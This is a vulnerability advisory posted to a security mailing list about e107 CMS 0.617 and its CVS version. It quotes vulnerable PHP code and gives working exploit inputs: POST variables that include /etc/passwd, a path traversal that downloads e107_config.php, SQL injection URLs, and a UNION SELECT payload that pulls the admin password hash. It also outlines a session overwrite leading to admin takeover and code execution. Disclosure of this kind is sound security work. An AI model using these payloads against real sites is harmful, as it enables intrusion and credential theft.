<<< Date Index >>>     <<< Thread Index >>>

Multiple vulnearabilities in e107 cms




Software: http://www.e107.org
Author: Heintz
Advisory origin: http://www.waraxe.us
Software bugtracker: 
http://e107.org/e107_plugins/bugtracker2/bugtracker2.php?0.bug.558

e107 v 0.617
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
search.php line ~ 142
if($_POST['searchquery']){
        echo "<div 
style='border:0;padding-right:2px;width:auto;height:400px;overflow:auto;'>";
        unset($text);
        extract($_POST);

here extract() registeres and overwrites any variables in _POST array - this is 
worse than
registered globals.

few lines forward:
if(file_exists($search_info[$key[$a]]['sfile'])){
   @require_once($search_info[$key[$a]]['sfile']);
   $ns -> tablerender(LAN_195." ".$search_info[$key[$a]]['qtype']." : 
".LAN_196.": ".$results, 

$text);
}

so we need to POST following variables:
searchquery=aaa
search_info[0][sfile]=/etc/passwd
searchtype[0]=0
searchtype[1]=0


lets look forward

top.php line ~79
sql queries before it has quotes around variable and those cant be braken out, 
but
in this case there isnt need to send any quotes in variable:

$replies = $sql2 -> db_Select("forum_t", "*", "thread_parent=$thread_id");

top.php?[INJECTION].active.all.[INJECTION]
though this requires mysql version to support subqueries, to have any use of 
this.

lets look more:
when downloads are handled/sent by php (this option turned on)

request.php ~87

send_file(e_FILE."public/".$download_url);

when theres not "http://"; or "ftp://"; in file to be downloaded, then 
file is read and sent to user.

request.php?../../e107_config.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

downloaded CVS and things are better but not enought,
this advisory continues with CVS version of software.
CVS is subject to change however.

lets start with less dangerous features of software:

e107_files/resetcore.php ~199

if (isset($_POST['reset_core_sub']) && $_POST['mode'] == 1) {
        
$a_name = preg_replace('/\\W/i', '', $_POST['a_name']);
$a_password = preg_replace('/\\W/i', '', $_POST['a_password']);
        
if (!$result = mysql_query("SELECT * FROM ".$mySQLprefix."user WHERE 
user_name='{$a_name}' AND 

user_password='{$a_password}' AND user_perms=0")) {
                exit;
}

if reset_core_sub and mode variables are set and sql query syntax is ok,
note i sayd query *syntax* - no data needs to retrieved with query.
then we get cms core configuration as a good info which we are going into.

lets move on

forum_viewforum.php ~196

if($sql -> db_Select("forum_t", "*",  "thread_forum_id='".$forum_id."' AND 
thread_parent='0' 

ORDER BY thread_s DESC, thread_lastpost DESC, thread_datestamp DESC LIMIT 
$from, $view")){

forum_viewforum.php?5.[INJECTION]#

lets go on

request.php line ~120

if ($type == "file")
{
$qry = "
SELECT d.*, dc.download_category_class FROM #download as d
LEFT JOIN #download_category AS dc ON dc.download_category_id = d.download_id
WHERE d.download_id = $id;
";

request.php?1/**/UNION/**/SELECT/**/null,null,concat(user_password,0x687474703A2F2F00),null,null,

null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/FROM/**/e107_user/**/WHE

RE/**/user_id=1

will try to redirect your browser to <adminhash>http://
in HTTP Location header.

and on

e107_handlers/upload_handler.php ~38


if ($pref['upload_storagetype'] == "2" && $avatar == FALSE) {
                extract($_FILES);
                for($c = 0; $c <= 1; $c++)


with enought knowlege about HTTP it would be possible to
"rewrite" _FILES to load local file to db (not very useful i guess, but read on)


extract() is able to rewrite _SESSION array, this is disasterous because this is
one array that is almost always trusted to contain valid data.
so we can enter admin hash and id to it and we are admin, and this leads to
own php code execution - which makes things real nasty.

Greets
~~~~~~~
slimjim100, fulvioo, Gotisch, KuerbY, legion and Torufoorum.
Special greets go to Waraxe.